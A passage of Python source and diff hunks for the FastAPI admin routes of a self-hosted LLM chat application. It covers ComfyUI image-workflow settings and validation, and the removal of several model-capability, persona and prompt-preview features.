# The placeholders a workflow has to carry to be worth having. Without a prompt
|
||||
# it draws the same picture whatever anybody types, which is the one failure
|
||||
# somebody would not think to look for.
|
||||
REQUIRED_PLACEHOLDERS = ("prompt",)
|
||||
|
||||
|
||||
def _lines(text: str) -> list[str]:
|
||||
"""One name per line, blanks dropped. The `admin_agents` pattern."""
|
||||
seen: list[str] = []
|
||||
for line in (text or "").splitlines():
|
||||
name = line.strip()
|
||||
if name and name not in seen:
|
||||
seen.append(name)
|
||||
return seen
|
||||
|
||||
|
||||
def _number(raw: str, name: str, *, whole: bool = True) -> Any:
|
||||
"""A filled box as a clamped number, an empty one as "".
|
||||
|
||||
The empty string is load-bearing and is not a missing value: it is how an
|
||||
administrator says "no opinion about this one", which `workflow.resolve`
|
||||
reads as "fall through to the built-in floor". Turning it into a zero here
|
||||
would silently set every instance to zero steps.
|
||||
"""
|
||||
text = (raw or "").strip()
|
||||
if not text:
|
||||
return ""
|
||||
try:
|
||||
value = float(text)
|
||||
except ValueError:
|
||||
return ""
|
||||
low, high = workflow_service.LIMITS.get(name, (None, None))
|
||||
if low is not None:
|
||||
value = min(max(value, low), high)
|
||||
return int(value) if whole else value
|
||||
|
||||
|
||||
def _config(db: Db) -> comfy.Config:
|
||||
values = settings_store.images(db)
|
||||
return comfy.Config(
|
||||
base_url=str(values.get("base_url") or ""),
|
||||
api_key=decrypt(str(values.get("api_key_encrypted") or "")),
|
||||
timeout=30.0,
|
||||
)
|
||||
|
||||
|
||||
def _page(request: Request, db: Db, **extra) -> Response:
|
||||
values = settings_store.images(db)
|
||||
workflows = list(
|
||||
db.scalars(select(ImageWorkflow).order_by(ImageWorkflow.position, ImageWorkflow.slug))
|
||||
)
|
||||
return render(
|
||||
request,
|
||||
"admin/images.html",
|
||||
{
|
||||
"values": values,
|
||||
"workflows": workflows,
|
||||
# Only models an administrator has marked as having vision can
|
||||
# review, so the picker offers those and nothing else -- a list
|
||||
# including text-only models would be a list of choices that
|
||||
# silently do nothing.
|
||||
"vision_models": list(
|
||||
db.scalars(
|
||||
select(Model)
|
||||
.where(Model.enabled.is_(True))
|
||||
.order_by(Model.position, Model.model_id)
|
||||
)
|
||||
),
|
||||
"checkpoints_text": "\n".join(values.get("checkpoints") or []),
|
||||
"masked": mask(decrypt(values.get("api_key_encrypted") or "")),
|
||||
"unchanged": UNCHANGED_SENTINEL,
|
||||
**extra,
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
@router.get("")
|
||||
async def images_page(request: Request, db: Db, user: AdminUser, saved: str = "") -> Response:
|
||||
return _page(request, db, saved=saved)
|
||||
|
||||
|
||||
@router.post("")
|
||||
async def save_images(
|
||||
request: Request,
|
||||
db: Db,
|
||||
user: AdminUser,
|
||||
enabled: bool = Form(False),
|
||||
base_url: str = Form(""),
|
||||
api_key: str = Form(""),
|
||||
timeout: float = Form(600.0),
|
||||
checkpoints: str = Form(""),
|
||||
default_workflow_id: str = Form(""),
|
||||
review_enabled: bool = Form(False),
|
||||
review_model_id: str = Form(""),
|
||||
max_tries: int = Form(4),
|
||||
preserve_vram: bool = Form(False),
|
||||
instructions: str = Form(""),
|
||||
# The generation defaults. Every one is a *string* even where it is a
|
||||
# number, because "" is how an administrator says "no opinion" and an
|
||||
# `int = Form(0)` cannot express that -- zero steps is a value, and one
|
||||
# somebody could mean. `_number` below turns a filled box into a clamped
|
||||
# number and an empty one back into "".
|
||||
default_checkpoint: str = Form(""),
|
||||
default_steps: str = Form(""),
|
||||
default_cfg: str = Form(""),
|
||||
default_width: str = Form(""),
|
||||
default_height: str = Form(""),
|
||||
default_sampler: str = Form(""),
|
||||
default_scheduler: str = Form(""),
|
||||
default_denoise: str = Form(""),
|
||||
default_negative: str = Form(""),
|
||||
default_batch: str = Form(""),
|
||||
) -> Response:
|
||||
"""Save the settings.
|
||||
|
||||
Every toggle defaults to False because an unticked checkbox is simply absent
|
||||
from a form post -- that absence *is* the off signal, the rule
|
||||
`admin_audio` states.
|
||||
|
||||
The discovered sampler and scheduler lists are deliberately not submitted
|
||||
and not cleared here: they belong to whatever ComfyUI was tested, and a save
|
||||
that only changed the instructions box has no opinion about them.
|
||||
"""
|
||||
current = settings_store.images(db)
|
||||
settings_store.update(
|
||||
db,
|
||||
{
|
||||
"enabled": enabled,
|
||||
"base_url": base_url.strip().rstrip("/"),
|
||||
"api_key_encrypted": keep_or_replace(
|
||||
api_key, current.get("api_key_encrypted") or ""
|
||||
),
|
||||
"timeout": min(max(timeout, 10.0), 3600.0),
|
||||
"checkpoints": _lines(checkpoints),
|
||||
"default_workflow_id": default_workflow_id.strip(),
|
||||
"review_enabled": review_enabled,
|
||||
"review_model_id": review_model_id.strip(),
|
||||
"max_tries": min(max(max_tries, 1), 10),
|
||||
"preserve_vram": preserve_vram,
|
||||
"instructions": instructions.strip()[:4000],
|
||||
# Clamped here to the same bounds `workflow.LIMITS` uses on the way
|
||||
# out. Twice, deliberately: a number stored by an earlier version,
|
||||
# or written straight into the settings row, still has to be safe
|
||||
# when a generation reads it.
|
||||
"default_checkpoint": default_checkpoint.strip(),
|
||||
"default_steps": _number(default_steps, "steps"),
|
||||
"default_cfg": _number(default_cfg, "cfg", whole=False),
|
||||
"default_width": _number(default_width, "width"),
|
||||
"default_height": _number(default_height, "height"),
|
||||
"default_sampler": default_sampler.strip(),
|
||||
"default_scheduler": default_scheduler.strip(),
|
||||
"default_denoise": _number(default_denoise, "denoise", whole=False),
|
||||
"default_negative": default_negative.strip()[:500],
|
||||
"default_batch": _number(default_batch, "batch"),
|
||||
},
|
||||
key=settings_store.IMAGES,
|
||||
)
|
||||
log.info("image generation %s by %s", "enabled" if enabled else "disabled", user.email)
|
||||
return RedirectResponse(
|
||||
"/admin/images?saved=Saved.", status_code=status.HTTP_303_SEE_OTHER
|
||||
)
|
||||
|
||||
|
||||
@router.post("/test")
|
||||
async def test_images(request: Request, db: Db, user: AdminUser) -> Response:
|
||||
"""Ask ComfyUI what it can do, and remember the answer.
|
||||
|
||||
Against the *saved* settings rather than the unsaved form, so what is tested
|
||||
is what a chat would actually reach -- the same rule `/admin/search/test`
|
||||
follows.
|
||||
|
||||
The lists are stored rather than only shown, because the request path may
|
||||
never ask ComfyUI anything: `harness.context_variables` is synchronous and
|
||||
the tool schema is built per request, so both read what this button wrote.
|
||||
"""
|
||||
config = _config(db)
|
||||
if not config.configured:
|
||||
return render(
|
||||
request,
|
||||
"admin/_images_result.html",
|
||||
{"message": "Set a base URL first.", "message_kind": "error"},
|
||||
)
|
||||
try:
|
||||
checkpoints, samplers, schedulers = await comfy.discover(config)
|
||||
except LLMError as exc:
|
||||
return render(
|
||||
request,
|
||||
"admin/_images_result.html",
|
||||
{"message": exc.message, "message_kind": "error"},
|
||||
)
|
||||
|
||||
stored = settings_store.images(db)
|
||||
changes: dict = {"samplers": samplers, "schedulers": schedulers}
|
||||
# The checkpoint list is filled in only when nobody has one yet, for the
|
||||
# reason a refreshed connection does not overwrite a context length an
|
||||
# administrator typed: they are usually narrowing it deliberately.
|
||||
if not stored.get("checkpoints"):
|
||||
changes["checkpoints"] = checkpoints
|
||||
settings_store.update(db, changes, key=settings_store.IMAGES)
|
||||
|
||||
found = (
|
||||
f"Found {len(checkpoints)} checkpoint{'' if len(checkpoints) == 1 else 's'}, "
|
||||
f"{len(samplers)} samplers and {len(schedulers)} schedulers."
|
||||
)
|
||||
return render(
|
||||
request,
|
||||
"admin/_images_result.html",
|
||||
{
|
||||
"message": found,
|
||||
"message_kind": "success",
|
||||
"checkpoints": checkpoints,
|
||||
"kept": bool(stored.get("checkpoints")),
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
# --- Workflows -----------------------------------------------------------------
|
||||
def _workflow(db: Db, workflow_id: str) -> ImageWorkflow:
|
||||
row = db.get(ImageWorkflow, workflow_id)
|
||||
if row is None:
|
||||
raise HTTPException(status.HTTP_404_NOT_FOUND, "That workflow no longer exists.")
|
||||
return row
|
||||
|
||||
|
||||
def _placeholder_help(db: Db) -> list[tuple[str, str, str, str]]:
|
||||
"""Every placeholder, what it fills, and what it resolves to *today*.
|
||||
|
||||
The last column is the point. A legend listing names answers "what may I
|
||||
write"; the question somebody actually has, standing in front of a workflow
|
||||
that came out wrong, is "what happens if I leave this out" -- and the answer
|
||||
moved the day instance defaults arrived. Resolved through the same call a
|
||||
generation makes, so the two cannot disagree.
|
||||
"""
|
||||
resolved = workflow_service.resolve({}, settings=settings_store.images(db))
|
||||
out: list[tuple[str, str, str, str]] = []
|
||||
for name in workflow_service.PLACEHOLDERS:
|
||||
kind, what = workflow_service.DESCRIPTIONS.get(name, ("text", ""))
|
||||
if name == "prompt":
|
||||
shown = "whatever is asked for"
|
||||
elif name == "seed":
|
||||
shown = "a fresh random one"
|
||||
elif name == "model":
|
||||
shown = str(resolved.get("model") or "") or "the first checkpoint listed"
|
||||
else:
|
||||
shown = str(resolved.get(name, ""))
|
||||
out.append((name, kind, what, shown))
|
||||
return out
|
||||
|
||||
|
||||
def _detail(
|
||||
request: Request, db: Db, row: ImageWorkflow, *, is_new: bool, error: str = "", **extra
|
||||
):
|
||||
return render(
|
||||
request,
|
||||
"admin/workflow_detail.html",
|
||||
{
|
||||
"workflow": row,
|
||||
"is_new": is_new,
|
||||
"error": error,
|
||||
"placeholders": workflow_service.PLACEHOLDERS,
|
||||
"placeholder_help": _placeholder_help(db),
|
||||
"workflow_text": extra.pop(
|
||||
"workflow_text", json.dumps(row.workflow_json or {}, indent=2)
|
||||
),
|
||||
**extra,
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
def _populate(row: ImageWorkflow, form) -> None:
|
||||
row.name = str(form.get("name") or "").strip()[:120]
|
||||
row.description = str(form.get("description") or "").strip()[:2000]
|
||||
row.enabled = "enabled" in form
|
||||
|
||||
|
||||
def _problem(db: Db, row: ImageWorkflow, form, *, existing_id: str = "") -> str:
|
||||
"""Why this cannot be saved, or an empty string.
|
||||
|
||||
A sentence rather than a 422, so a rejected save re-renders the form with
|
||||
what was typed still in it -- losing forty lines of JSON to a validation
|
||||
error is not a thing to do to somebody.
|
||||
"""
|
||||
if not row.name:
|
||||
return "A workflow needs a name."
|
||||
|
||||
slug = str(form.get("slug") or "").strip().lower()
|
||||
if not SLUG_PATTERN.match(slug):
|
||||
return (
|
||||
"The name the model uses must be lowercase letters, digits, "
|
||||
"hyphens or underscores, and start with a letter or digit."
|
||||
)
|
||||
clash = db.scalar(select(ImageWorkflow).where(ImageWorkflow.slug == slug))
|
||||
if clash is not None and clash.id != existing_id:
|
||||
return f"There is already a workflow called “{slug}”."
|
||||
row.slug = slug
|
||||
|
||||
raw = str(form.get("workflow") or "").strip()
|
||||
if not raw:
|
||||
return "Paste the workflow, in ComfyUI's API format."
|
||||
try:
|
||||
parsed = json.loads(raw)
|
||||
except json.JSONDecodeError as exc:
|
||||
return f"That is not valid JSON: {exc}"
|
||||
if not isinstance(parsed, dict) or not parsed:
|
||||
return (
|
||||
"A ComfyUI API workflow is a JSON object keyed by node id. Use "
|
||||
"“Export (API)” in ComfyUI rather than “Save”."
|
||||
)
|
||||
|
||||
# The check worth having: a workflow with no {{prompt}} in it draws the same
|
||||
# picture whatever anybody types, and would look like a broken model rather
|
||||
# than an unparameterised template.
|
||||
found = workflow_service.placeholders_in(parsed)
|
||||
missing = [name for name in REQUIRED_PLACEHOLDERS if name not in found]
|
||||
if missing:
|
||||
return (
|
||||
f"The workflow never uses {{{{{missing[0]}}}}}, so every image would be "
|
||||
f"the same. Put it where the text prompt goes."
|
||||
)
|
||||
unknown = found - set(workflow_service.PLACEHOLDERS)
|
||||
if unknown:
|
||||
return f"Unknown placeholder {{{{{sorted(unknown)[0]}}}}}."
|
||||
|
||||
row.workflow_json = parsed
|
||||
return ""
|
||||
|
||||
|
||||
@router.get("/workflows/new")
|
||||
async def new_workflow(request: Request, db: Db, user: AdminUser) -> Response:
|
||||
"""A draft, never persisted -- the `admin_tools` shape.
|
||||
|
||||
Registered before `/workflows/{workflow_id}`: FastAPI matches in
|
||||
registration order, and with the parameterised route first "new" is an id.
|
||||
"""
|
||||
from pathlib import Path
|
||||
|
||||
base = Path(__file__).resolve().parent.parent / "services/images/base_workflow.json"
|
||||
draft = ImageWorkflow(
|
||||
slug="",
|
||||
name="",
|
||||
description="",
|
||||
workflow_json=json.loads(base.read_text(encoding="utf-8")),
|
||||
enabled=True,
|
||||
)
|
||||
return _detail(request, db, draft, is_new=True)
|
||||
|
||||
|
||||
@router.post("/workflows")
|
||||
async def create_workflow(request: Request, db: Db, user: AdminUser) -> Response:
|
||||
form = await request.form()
|
||||
row = ImageWorkflow(workflow_json={})
|
||||
_populate(row, form)
|
||||
problem = _problem(db, row, form)
|
||||
if problem:
|
||||
return _detail(
|
||||
request,
|
||||
db,
|
||||
row,
|
||||
is_new=True,
|
||||
error=problem,
|
||||
workflow_text=str(form.get("workflow") or ""),
|
||||
)
|
||||
row.position = (
|
||||
db.scalar(select(func.coalesce(func.max(ImageWorkflow.position), -1))) or -1
|
||||
) + 1
|
||||
db.add(row)
|
||||
db.commit()
|
||||
log.info("%s added image workflow %s", user.email, row.slug)
|
||||
return RedirectResponse(
|
||||
f"/admin/images?saved=Added {row.name}.", status_code=status.HTTP_303_SEE_OTHER
|
||||
)
|
||||
|
||||
|
||||
@router.get("/workflows/{workflow_id}/edit")
|
||||
async def edit_workflow(request: Request, db: Db, user: AdminUser, workflow_id: str) -> Response:
|
||||
return _detail(request, db, _workflow(db, workflow_id), is_new=False)
|
||||
|
||||
|
||||
@router.post("/workflows/{workflow_id}/delete")
|
||||
async def delete_workflow(db: Db, user: AdminUser, workflow_id: str) -> Response:
|
||||
row = _workflow(db, workflow_id)
|
||||
name = row.name
|
||||
db.delete(row)
|
||||
db.commit()
|
||||
log.info("%s deleted image workflow %s", user.email, name)
|
||||
return RedirectResponse(
|
||||
f"/admin/images?saved=Deleted {name}.", status_code=status.HTTP_303_SEE_OTHER
|
||||
)
|
||||
|
||||
|
||||
@router.post("/workflows/{workflow_id}")
|
||||
async def update_workflow(request: Request, db: Db, user: AdminUser, workflow_id: str) -> Response:
|
||||
row = _workflow(db, workflow_id)
|
||||
form = await request.form()
|
||||
|
||||
# Validated against a draft, so a rejected save leaves the stored row alone
|
||||
# and the form still holds what was typed.
|
||||
draft = ImageWorkflow(workflow_json={}, position=row.position)
|
||||
_populate(draft, form)
|
||||
problem = _problem(db, draft, form, existing_id=row.id)
|
||||
if problem:
|
||||
draft.id = row.id
|
||||
return _detail(
|
||||
request,
|
||||
db,
|
||||
draft,
|
||||
is_new=False,
|
||||
error=problem,
|
||||
workflow_text=str(form.get("workflow") or ""),
|
||||
)
|
||||
|
||||
_populate(row, form)
|
||||
row.slug = draft.slug
|
||||
row.workflow_json = draft.workflow_json
|
||||
row.last_checked_at = datetime.now(UTC)
|
||||
row.last_error = ""
|
||||
db.commit()
|
||||
log.info("%s updated image workflow %s", user.email, row.slug)
|
||||
return RedirectResponse(
|
||||
f"/admin/images?saved=Saved {row.name}.", status_code=status.HTTP_303_SEE_OTHER
|
||||
)
|
||||
@@ -4,7 +4,6 @@ from __future__ import annotations
|
||||
|
||||
import contextlib
|
||||
import logging
|
||||
from urllib.parse import quote
|
||||
|
||||
from fastapi import APIRouter, File, Form, HTTPException, Request, Response, UploadFile, status
|
||||
from fastapi.responses import FileResponse, RedirectResponse
|
||||
@@ -12,9 +11,8 @@ from sqlalchemy import select
|
||||
from sqlalchemy.orm import Session as DBSession
|
||||
|
||||
from lembas.api.deps import AdminUser, Db, RequiredUser
|
||||
from lembas.db.models import AUTHOR_USER, Connection, Group, Model, PersonaRevision
|
||||
from lembas.db.models import Connection, Group, Model
|
||||
from lembas.services import chat as chat_service
|
||||
from lembas.services import personas as personas_service
|
||||
from lembas.services import settings_store, uploads
|
||||
from lembas.services.llm.openai_client import MAX_CONTEXT
|
||||
from lembas.web.templating import render
|
||||
@@ -25,10 +23,7 @@ router = APIRouter(tags=["admin-models"])
|
||||
|
||||
# What the endpoint can do. Endpoints do not advertise any of this reliably, so
|
||||
# these are an administrator's assertion.
|
||||
# `embeddings` is the odd one out and is worth naming as such: the other three
|
||||
# say what a model can do in a *chat*, and this one says it is not for chatting
|
||||
# at all. It is what /admin/extraction picks from, and nothing else reads it.
|
||||
PROTOCOL_CAPABILITIES = ("reasoning", "vision", "tools", "embeddings")
|
||||
PROTOCOL_CAPABILITIES = ("reasoning", "vision", "tools")
|
||||
|
||||
# Which tools this model is given. Distinct from the above: `tools` is whether a
|
||||
# tools array may be sent at all, these are what goes in it. Every one of them is
|
||||
@@ -41,7 +36,6 @@ PROTOCOL_CAPABILITIES = ("reasoning", "vision", "tools", "embeddings")
|
||||
# page nobody can read.
|
||||
TOOL_CAPABILITIES = (
|
||||
("tool_web_search", "Web search"),
|
||||
("tool_fetch", "Fetch a page"),
|
||||
("tool_knowledge", "Knowledge"),
|
||||
("tool_notes", "Notes"),
|
||||
("tool_memory", "Memory"),
|
||||
@@ -49,13 +43,6 @@ TOOL_CAPABILITIES = (
|
||||
("tool_custom", "Custom tools"),
|
||||
("tool_mcp", "MCP servers"),
|
||||
("tool_ask", "Ask the reader"),
|
||||
("tool_report", "Reports"),
|
||||
("tool_image", "Image generation"),
|
||||
("tool_scratch", "Canvas"),
|
||||
("tool_schedule", "Scheduling"),
|
||||
("tool_subagent", "Helpers"),
|
||||
("tool_friend", "Ask another model"),
|
||||
("tool_persona", "Edit its own personality"),
|
||||
("tool_agent", "Agent execution"),
|
||||
)
|
||||
|
||||
@@ -166,13 +153,7 @@ async def models_page(
|
||||
|
||||
@router.get("/admin/models/{model_id}/edit")
|
||||
async def model_detail(
|
||||
request: Request,
|
||||
db: Db,
|
||||
user: AdminUser,
|
||||
model_id: str,
|
||||
saved: str = "",
|
||||
detected: str = "",
|
||||
message: str = "",
|
||||
request: Request, db: Db, user: AdminUser, model_id: str, saved: str = ""
|
||||
):
|
||||
"""Everything about one model, on its own page."""
|
||||
model = _model(db, model_id)
|
||||
@@ -187,16 +168,7 @@ async def model_detail(
|
||||
"groups": list(db.scalars(select(Group).order_by(Group.name))),
|
||||
"capabilities": PROTOCOL_CAPABILITIES,
|
||||
"tool_capabilities": TOOL_CAPABILITIES,
|
||||
# Every effort this application understands, so an administrator
|
||||
# can tick the ones their model actually takes -- and the model's
|
||||
# current answer, which is the common three until somebody says.
|
||||
"efforts": chat_service.EFFORTS,
|
||||
"model_efforts": chat_service.efforts_for(model),
|
||||
# What `detect-efforts` found, if it has just run. Escaped by the
|
||||
# template like every other value; it is prose the endpoint or this
|
||||
# application wrote, not markup.
|
||||
"detected": detected if detected in ("success", "warning") else "",
|
||||
"detected_message": message[:400],
|
||||
# Rows predating the split have no tool_* keys at all. Showing them
|
||||
# unticked would be a lie: tools.enabled_tools treats absent as on
|
||||
# when `tools` is on, so that an upgrade does not silently take web
|
||||
@@ -204,12 +176,6 @@ async def model_detail(
|
||||
"tool_default": bool((model.capabilities_json or {}).get("tools")),
|
||||
"default_model": settings_store.get(db, "default_model") or "",
|
||||
"instance_prompt": settings_store.get(db, "system_prompt") or "",
|
||||
# Who this model is, and everything it has been before. Passed even
|
||||
# when the capability is off: an administrator has to be able to read
|
||||
# and undo what a model wrote *before* they switched it off, which is
|
||||
# exactly when they would come looking.
|
||||
"persona": personas_service.get(db, model.model_id, None),
|
||||
"persona_limit": personas_service.MAX_PERSONA_CHARS,
|
||||
"position_of": index + 1,
|
||||
"total": len(ordered),
|
||||
"previous": ordered[index - 1] if index > 0 else None,
|
||||
@@ -256,7 +222,6 @@ async def update_model(
|
||||
model_id: str,
|
||||
display_name: str = Form(""),
|
||||
description: str = Form(""),
|
||||
notes: str = Form(""),
|
||||
system_prompt: str = Form(""),
|
||||
enabled: bool = Form(False),
|
||||
pinned: bool = Form(False),
|
||||
@@ -264,7 +229,6 @@ async def update_model(
|
||||
position: str = Form(""),
|
||||
context_length: str = Form(""),
|
||||
default_effort: str = Form(""),
|
||||
reasoning_efforts: list[str] = Form(default=[]),
|
||||
group_ids: list[str] = Form(default=[]),
|
||||
capability: list[str] = Form(default=[]),
|
||||
) -> Response:
|
||||
@@ -272,7 +236,6 @@ async def update_model(
|
||||
|
||||
model.display_name = display_name.strip()[:300]
|
||||
model.description = description.strip()[:2000]
|
||||
model.notes = notes.strip()[:2000]
|
||||
model.system_prompt = system_prompt.strip()[:8000]
|
||||
# A string, so an emptied field is distinguishable and junk can be ignored
|
||||
# rather than becoming a 422 -- the same shape `position` uses below.
|
||||
@@ -288,19 +251,9 @@ async def update_model(
|
||||
# Merged rather than rebuilt, unlike the capabilities below: params_json
|
||||
# holds whatever sampling defaults an administrator has set and this form
|
||||
# only carries one of them.
|
||||
# Which efforts this model takes at all. Submitted as a list of ticked
|
||||
# values; empty means "nobody has said", and `chat.efforts_for` answers with
|
||||
# the common three. Stored in the order `EFFORTS` declares rather than the
|
||||
# order a browser happened to send.
|
||||
chosen = [value for value in chat_service.EFFORTS if value in (reasoning_efforts or [])]
|
||||
model.reasoning_efforts = chosen
|
||||
|
||||
params = dict(model.params_json or {})
|
||||
wanted = default_effort.strip().lower()
|
||||
# Checked against what this model takes, not against everything this
|
||||
# application has heard of -- a default of `high` on a model whose template
|
||||
# refuses it is a chat that fails on its first turn.
|
||||
if wanted in chat_service.efforts_for(model):
|
||||
if wanted in chat_service.EFFORTS:
|
||||
params["reasoning_effort"] = wanted
|
||||
else:
|
||||
params.pop("reasoning_effort", None)
|
||||
@@ -338,69 +291,6 @@ async def update_model(
|
||||
)
|
||||
|
||||
|
||||
@router.post("/admin/models/{model_id}/persona")
|
||||
async def update_persona(
|
||||
db: Db,
|
||||
user: AdminUser,
|
||||
model_id: str,
|
||||
content: str = Form(""),
|
||||
) -> Response:
|
||||
"""Write or clear this model's own personality.
|
||||
|
||||
Its own form and its own route rather than a field on the big save, for the
|
||||
reason the effort detection has one: the text can be rewritten by the model
|
||||
itself between two page loads, and a field carried along by an unrelated save
|
||||
would put a stale copy back without anybody meaning to.
|
||||
"""
|
||||
model = _model(db, model_id)
|
||||
text = content.strip()
|
||||
existing = personas_service.get(db, model.model_id, None)
|
||||
|
||||
if not text:
|
||||
if existing is not None:
|
||||
personas_service.clear(db, existing)
|
||||
log.info("persona for %s cleared by %s", model.model_id, user.email)
|
||||
return RedirectResponse(
|
||||
f"/admin/models/{model.id}/edit?saved=Personality+cleared.", status_code=303
|
||||
)
|
||||
|
||||
personas_service.write(
|
||||
db,
|
||||
model_key=model.model_id,
|
||||
owner=None,
|
||||
content=text,
|
||||
author=AUTHOR_USER,
|
||||
note="edited here",
|
||||
)
|
||||
log.info("persona for %s written by %s", model.model_id, user.email)
|
||||
return RedirectResponse(
|
||||
f"/admin/models/{model.id}/edit?saved=Personality+saved.", status_code=303
|
||||
)
|
||||
|
||||
|
||||
@router.post("/admin/models/{model_id}/persona/revert")
|
||||
async def revert_persona(
|
||||
db: Db,
|
||||
user: AdminUser,
|
||||
model_id: str,
|
||||
revision_id: str = Form(""),
|
||||
) -> Response:
|
||||
"""Put an earlier text back. The text being replaced is itself kept."""
|
||||
model = _model(db, model_id)
|
||||
row = personas_service.get(db, model.model_id, None)
|
||||
revision = db.get(PersonaRevision, revision_id) if revision_id else None
|
||||
# Checked against *this* persona rather than merely existing: a revision id
|
||||
# from another model's history would otherwise transplant its personality.
|
||||
if row is None or revision is None or revision.persona_id != row.id:
|
||||
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="No such version")
|
||||
|
||||
personas_service.revert(db, row, revision)
|
||||
log.info("persona for %s reverted by %s", model.model_id, user.email)
|
||||
return RedirectResponse(
|
||||
f"/admin/models/{model.id}/edit?saved=Earlier+version+restored.", status_code=303
|
||||
)
|
||||
|
||||
|
||||
@router.post("/admin/models/{model_id}/move")
|
||||
async def move_model(
|
||||
db: Db,
|
||||
@@ -428,55 +318,6 @@ async def move_model(
|
||||
return RedirectResponse(back or "/admin/models", status_code=303)
|
||||
|
||||
|
||||
@router.post("/admin/models/{model_id}/detect-efforts")
|
||||
async def detect_efforts(db: Db, user: AdminUser, model_id: str) -> Response:
|
||||
"""Ask the endpoint which reasoning efforts this model actually takes.
|
||||
|
||||
llama-server hands its loaded model's Jinja chat template over on `/props`,
|
||||
and that template is the thing that rejects an effort it does not know -- so
|
||||
the accepted set is written down in the one place that is authoritative,
|
||||
rather than having to be guessed at or discovered by a failed reply.
|
||||
|
||||
Anything that is not a llama-server answers nothing here, and that is a
|
||||
normal outcome: OpenAI and vLLM have no such route, and their models are
|
||||
documented rather than introspectable. The result then says so instead of
|
||||
claiming the model accepts nothing.
|
||||
"""
|
||||
from lembas.services.llm.openai_client import Endpoint, fetch_chat_template
|
||||
|
||||
model = _model(db, model_id)
|
||||
connection = db.get(Connection, model.connection_id)
|
||||
if connection is None:
|
||||
raise HTTPException(status.HTTP_404_NOT_FOUND, "That connection no longer exists.")
|
||||
|
||||
template = await fetch_chat_template(Endpoint.from_connection(connection))
|
||||
found = chat_service.efforts_from_chat_template(template)
|
||||
|
||||
if found:
|
||||
model.reasoning_efforts = found
|
||||
db.commit()
|
||||
message = "This model's template accepts: " + ", ".join(found) + "."
|
||||
kind = "success"
|
||||
elif template:
|
||||
message = (
|
||||
"The endpoint gave up its chat template, but nothing in it names a "
|
||||
"set of reasoning efforts. Either this model does not take one, or "
|
||||
"it accepts anything and never checks."
|
||||
)
|
||||
kind = "warning"
|
||||
else:
|
||||
message = (
|
||||
"This endpoint does not publish its chat template, so there is "
|
||||
"nothing to read. llama.cpp does; OpenAI and vLLM do not."
|
||||
)
|
||||
kind = "warning"
|
||||
|
||||
return RedirectResponse(
|
||||
f"/admin/models/{model.id}/edit?detected={kind}&message={quote(message)}",
|
||||
status_code=status.HTTP_303_SEE_OTHER,
|
||||
)
|
||||
|
||||
|
||||
@router.post("/admin/models/{model_id}/default")
|
||||
async def set_default_model(
|
||||
db: Db, user: AdminUser, model_id: str, back: str = Form("")
|
||||
|
||||
@@ -18,7 +18,6 @@ from lembas.services import harness as harness_service
|
||||
from lembas.services import prompts as prompts_service
|
||||
from lembas.services import settings_store
|
||||
from lembas.services import tools as tools_service
|
||||
from lembas.services.agent import policy
|
||||
from lembas.web.templating import render
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
@@ -29,49 +28,6 @@ router = APIRouter(prefix="/admin/prompts", tags=["admin-prompts"])
|
||||
# in place rather than imagined. An administrator can clear the field.
|
||||
SAMPLE_DOCUMENTS = "report.pdf, notes.txt"
|
||||
|
||||
# The rest of what a preview has to pretend, and the reason it must.
|
||||
#
|
||||
# `harness.context_variables` fills most `requires` gates only when it is handed
|
||||
# a real `Chat` -- the machine, the directory, the plan, the project listing, a
|
||||
# scheduled task's instruction, the flag saying this is a helper. The preview
|
||||
# passes `chat=None`, so every one of those stayed empty and **eleven gated
|
||||
# fragments could never appear in it at all**: the whole agent surface, both
|
||||
# scheduling fragments, and the helper warning. An administrator editing
|
||||
# `tool.agent` previewed a system message with `tool.agent` missing from it, and
|
||||
# nothing said so.
|
||||
#
|
||||
# Samples rather than a transient Chat. `compose_from` takes plain variables
|
||||
# precisely so this screen never has to build one, and a constructed row would
|
||||
# need a connection, a profile and a directory that exist -- inventing an SSH
|
||||
# host to render a paragraph is a worse trade than inventing the paragraph's
|
||||
# values. This is what `SAMPLE_DOCUMENTS` has always done, extended to the rest.
|
||||
SAMPLE_AGENT = {
|
||||
"agent_target": "buildbox",
|
||||
"agent_dir": "/srv/www/example",
|
||||
"agent_rewound": "on 3 August at 14:20",
|
||||
"background": "on",
|
||||
"project_files": "src/\n app.py\n models.py\nREADME.md\npyproject.toml",
|
||||
"agent_instructions": "Run the tests with `make check` before proposing a change.",
|
||||
"agent_instructions_file": "AGENTS.md",
|
||||
"plan": "1. [done] Read the failing test\n2. [doing] Fix the parser\n3. [todo] Add a case",
|
||||
}
|
||||
|
||||
SAMPLE_SCHEDULE = {
|
||||
"schedule_instruction": "Summarise what changed in the repository since yesterday.",
|
||||
"schedule_summary": "every weekday at 08:00",
|
||||
}
|
||||
|
||||
# Situations a chat can be in that are not a tool family, so nothing on the
|
||||
# "Tools offered" row can reach them. `kind` and `parent_chat_id` in the model.
|
||||
SITUATION_ORDINARY = ""
|
||||
SITUATION_TASK = "task"
|
||||
SITUATION_HELPER = "helper"
|
||||
SITUATIONS = (
|
||||
(SITUATION_ORDINARY, "An ordinary chat"),
|
||||
(SITUATION_TASK, "A scheduled task, running unattended"),
|
||||
(SITUATION_HELPER, "A helper sent by another model"),
|
||||
)
|
||||
|
||||
|
||||
def _families_of(db: Db, names: list[str]) -> list[str]:
|
||||
"""Keep only real family names, in the registry's order.
|
||||
@@ -98,8 +54,6 @@ def _variables(
|
||||
model_name: str = "",
|
||||
bases: str = "",
|
||||
documents: str = "",
|
||||
situation: str = SITUATION_ORDINARY,
|
||||
mode: str = "",
|
||||
) -> dict[str, str]:
|
||||
"""The preview's variable values.
|
||||
|
||||
@@ -110,14 +64,7 @@ def _variables(
|
||||
|
||||
No Chat row is made. `harness.compose_from` takes plain variables precisely
|
||||
so that this screen never has to build a transient one.
|
||||
|
||||
The samples are gated exactly as `context_variables` gates the real values --
|
||||
the agent block on the `agent` family, the schedule and helper blocks on the
|
||||
situation rather than on any family, because neither is a tool. A preview
|
||||
that admitted a fragment the real request would not is worse than one that
|
||||
omitted it, so the gating is mirrored rather than approximated.
|
||||
"""
|
||||
from lembas.services.agent import policy
|
||||
from lembas.services.library import memories as memories_service
|
||||
from lembas.services.library import skills as skills_service
|
||||
|
||||
@@ -132,18 +79,6 @@ def _variables(
|
||||
"document_names": documents,
|
||||
}
|
||||
)
|
||||
if "agent" in families:
|
||||
